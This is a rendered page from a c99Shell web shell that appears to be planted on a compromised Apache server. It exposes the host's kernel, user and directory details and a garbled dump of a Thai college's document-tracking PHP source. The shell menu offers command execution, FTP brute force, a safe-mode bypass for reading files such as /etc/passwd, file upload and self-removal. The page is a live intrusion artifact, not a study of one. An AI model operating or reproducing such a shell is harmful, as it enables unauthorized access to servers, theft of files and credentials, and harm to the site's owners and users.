!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/admin/   drwxr-xr-x
Free 52.35 GB of 127.8 GB (40.96%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     sendReceiveDoc_c.php (18.02 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
SearchByInputThai(); $oDP = new Department($oC); $oTsr = new sendreceive($oC); $oTsr2 = new sendreceive($oC); $oTsr3 = new sendreceive($oC); $oDlc = new DocLineConfig($oC); $oDlc2 = new DocLineConfig($oC); $oDlc3 = new DocLineConfig($oC); $oDlc4 = new DocLineConfig($oC); $oDlp = new docLinePosition($oC); $oDlp1 = new docLinePosition($oC); $oDlp2 = new docLinePosition($oC); $oDsl = new DocSpeedLevel($oC); $oDcl = new DocSecretLevel($oC); $oDsl2 = new DocSpeedLevel($oC); $oDcl2 = new DocSecretLevel($oC); $oCd = new collegedetail($oC); $oCd2 = new collegedetail($oC); $MaxDocGroup=$oDP->SearchMaxDocGroup(); if($DLCID && $one_position!="1"){ include_once "selectposition.php"; $oDlc->SearchByKey($DLCID); $oDlc->GetRecord(); $checkcan=SearchSendAll_receive($oDlc->DlpID); ?>
">การติดตามหนังสือรับอิเล็กทรอนิกส์
" size="3"> การติดตามหนังสือรับอิเล็กทรอนิกส์   sendAllNode=='Y'){ ?>[ เริ่มดาวน์โหลดเอกสาร]


"> SearchDocStatusNoReceive($GLOBALS["COLLEGEID"],'r4'); $i=0; while($oTsr->GetRecord() && $checkcan=='All'){ if(($i%2) == 0) echo ""; else echo ""; ?> tsr_DslID=="0"){ $rapid="../picture/rapid0.jpg"; $rapidname=$oDsl2->SearchName(0); }else if($oTsr->tsr_DslID=="1"){ $rapid="../picture/rapid1.jpg"; $rapidname=$oDsl2->SearchName(1); }else if($oTsr->tsr_DslID=="2"){ $rapid="../picture/rapid2.jpg"; $rapidname=$oDsl2->SearchName(2); }else if($oTsr->tsr_DslID=="3"){ $rapid="../picture/rapid3.jpg"; $rapidname=$oDsl2->SearchName(3); }else{ $rapid="../picture/blank.gif"; $rapidname=""; }?> tsr_DclID=="0"){ $secret="../picture/secret0.jpg"; $secretname=$oDcl2->SearchName(0); }else if($oTsr->tsr_DclID=="1"){ $secret="../picture/secret1.jpg"; $secretname=$oDcl2->SearchName(1); }else if($oTsr->tsr_DclID=="2"){ $secret="../picture/secret2.jpg"; $secretname=$oDcl2->SearchName(2); }else if($oTsr->tsr_DclID=="3"){ $secret="../picture/secret3.jpg"; $secretname=$oDcl2->SearchName(3); }else if($oTsr->tsr_DclID=="4"){ $secret="../picture/secret4.jpg"; $secretname=$oDcl2->SearchName(4); }else{ $secret="../picture/blank.gif"; $secretname=""; }?>
" size="2">ที่ " size="2">ลงวันที่ " size="2">เรื่อง (จาก) " size="2">วันที่รับหนังสือ " size="2">สถานะ
tsr_DocNo); ?> tsr_DocDate =="0000-00-00"){ echo ""; }else{ echo abbreDate(splitDateDb2($oTsr->tsr_DocDate ,'/')); }?>  tsr_DocSubject); ?> SearchByKey($oTsr->tsr_fr_node); $oCd->GetRecord(); echo " (จาก".$oCd->collegeAbbr.')'; ?> tsr_to_node_date !="0000-00-00 00:00:00"){ list($DocD,$DocT) = split(' ',$oTsr->tsr_to_node_date ); echo abbreDate2($DocD,'/')."
".a2th($DocT); } ?>
 tsr_status); ?>
" size="2">** ไม่มีรายการหนังสือรับภายนอก **
 


  " size="2"> style="display:none; cursor:pointer" style="display:''; cursor:pointer" onclick="up_downList('')">แสดง แสดงรายการหนังสือที่ดาวน์โหลดสำเร็จแล้วทั้งหมด style="display:''; cursor:pointer" style="display:none; cursor:pointer" alt="ซ่อน" onclick="up_downList('')">ซ่อน ซ่อนรายการหนังสือที่ดาวน์โหลดสำเร็จแล้วทั้งหมด style="display:''; border-collapse:collapse" style="display:none; border-collapse:collapse" >
" size="2"> DlpPID!="0"){ ?> ค้นหาหนังสือ (เรื่อง/ว่าด้วย)   " size="2"> (ที่/ฉบับที่/ครั้งที่/เลขที่)    
ประจำเดือน    onKeyUp="On_Year('','','')" onKeyPress="event.keyCode=CheckInput(event.keyCode,''); return event.keyCode;">   
"> SearchCountDocStatusReceiveNumrow($GLOBALS["COLLEGEID"],'r4',$monthe,th2a($searchYear),th2a($searchName),th2a($searchNo)); } $page_size = 10; $total_page = (int)($numRow/$page_size); if(($numRow%$page_size) != 0) $total_page++; if(isset($page_id)) $start = $page_size*($page_id-1); else { $page_id = 1; $start = 0; } //------------------------------- $z=0; $oTsr3->SearchDocStatuslimitReceive($GLOBALS["COLLEGEID"],'r4', $start, $page_size,$monthe,th2a($searchYear),th2a($searchName),th2a($searchNo)); while($oTsr3->GetRecord() && $checkcan=='All'){ if(($z%2) == 0) echo ""; else echo ""; ?>
" size="2">ที่ " size="2">ลงวันที่ " size="2">เรื่อง (จาก) " size="2">วันที่รับหนังสือ " size="2">ดำเนินการ
tsr_DocNo); ?> tsr_DocDate =="0000-00-00"){ echo ""; }else{ echo abbreDate(splitDateDb2($oTsr3->tsr_DocDate ,'/')); }?>   tsr_DocSubject); ?> SearchByKey($oTsr3->tsr_fr_node); $oCd2->GetRecord(); echo " (จาก".$oCd2->collegeAbbr.')'; ?> tsr_fr_node_date!="0000-00-00 00:00:00"){ list($DocD,$DocT) = split(' ',$oTsr3->tsr_to_node_date); echo abbreDate2($DocD,'/')."
".a2th($DocT); } ?>
tsr_receive=='Y'){ echo "ลงทะเบียนแล้ว"; list($DocD,$DocT) = split(' ',$oTsr3->tsr_receivedate); echo '
'.abbreDate2($DocD,'/')."
".a2th($DocT); }else if($oTsr3->tsr_receive=='N'){ echo "ไม่ลงทะเบียน"; list($DocD,$DocT) = split(' ',$oTsr3->tsr_receivedate); echo '
'.abbreDate2($DocD,'/')."
".a2th($DocT); }else{ ?>
" size="2">** ไม่มีรายการหนังสือ **
หน้า-> ";}?>   

" size="2"> หมายเหตุ :   " size="2">คลิกที่เรื่องหนังสือเพื่อดูรายละเอียดหนังสือ

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0061 ]--